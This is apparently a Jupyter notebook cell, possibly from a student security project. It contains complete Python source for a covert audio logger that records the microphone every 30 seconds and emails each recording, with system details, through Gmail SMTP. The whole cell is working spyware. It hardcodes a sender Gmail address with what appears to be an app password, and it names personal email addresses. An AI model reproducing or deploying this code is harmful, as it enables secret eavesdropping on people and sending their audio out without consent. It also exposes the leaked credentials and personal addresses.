In [ ]:
import threading
import sounddevice as sd
from scipy.io.wavfile import write
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.mime.text import MIMEText
from email.utils import COMMASPACE
from email import encoders
import platform
import psutil

sender_email = 'vishnuk010101@gmail.com'
sender_password = 'foqvfrqjuogwsbda'
receiver_email = 'asish.vishnu2020@vitstudent.ac.in'
subject = 'Screenlogging Data'
body = 'System Details:\n\n' + f'Platform: {platform.system()} {platform.release()}\nProcessor: {platform.processor()}\nRAM: {str(round(psutil.virtual_memory().total / (1024.0 **3)))} GB'

def send_mail(send_from, password, send_to, subject, body, files=[], server="smtp.gmail.com", port=587):
    """Send email with attachment using Gmail SMTP server"""
    msg = MIMEMultipart()
    msg['From'] = send_from
    msg['To'] = COMMASPACE.join(send_to)
    msg['Subject'] = subject

    msg.attach(MIMEText(body, 'plain'))

    for file in files:
        part = MIMEBase('application', 'octet-stream')
        part.set_payload(open(file, 'rb').read())
        encoders.encode_base64(part)
        part.add_header('Content-Disposition', 'attachment', filename=file.split("/")[-1])
        msg.attach(part)

    smtp = smtplib.SMTP(server, port)
    smtp.starttls()
    smtp.login(send_from, password)
    smtp.sendmail(send_from, send_to, msg.as_string())
    smtp.quit()

SEND_REPORT_EVERY = 30
FILENAME = "C:\\Users\\Vishnu\\Documents\\ism\\AudioOutput.wav"
TYPE = "Audiologging Data"

class AudioLogger:
    def __init__(self, time_interval, email, password):
        self.interval = time_interval
        self.log = "AudioLogger Started..."
        self.email = email
        self.password = password
    
    def save_audio(self):
        fs = 44100
        seconds = 5
        myrecording = sd.rec(int(seconds * fs), samplerate=fs, channels=2)
        sd.wait()
        write(FILENAME, fs, myrecording)
        send_to = [self.email]
        subject = TYPE
        body = 'System Details:\n\n' + f'Platform: {platform.system()} {platform.release()}\nProcessor: {platform.processor()}\nRAM: {str(round(psutil.virtual_memory().total / (1024.0 **3)))} GB'
        files = [FILENAME]
        send_mail(sender_email, sender_password, send_to, subject, body, files)
    
    def report(self):
        self.save_audio()
        timer = threading.Timer(self.interval, self.report)
        timer.start()
    
    def run(self):
        self.report()

print("Send Audio")
Audiologger = AudioLogger(SEND_REPORT_EVERY, receiver_email, sender_password)
Audiologger.run()
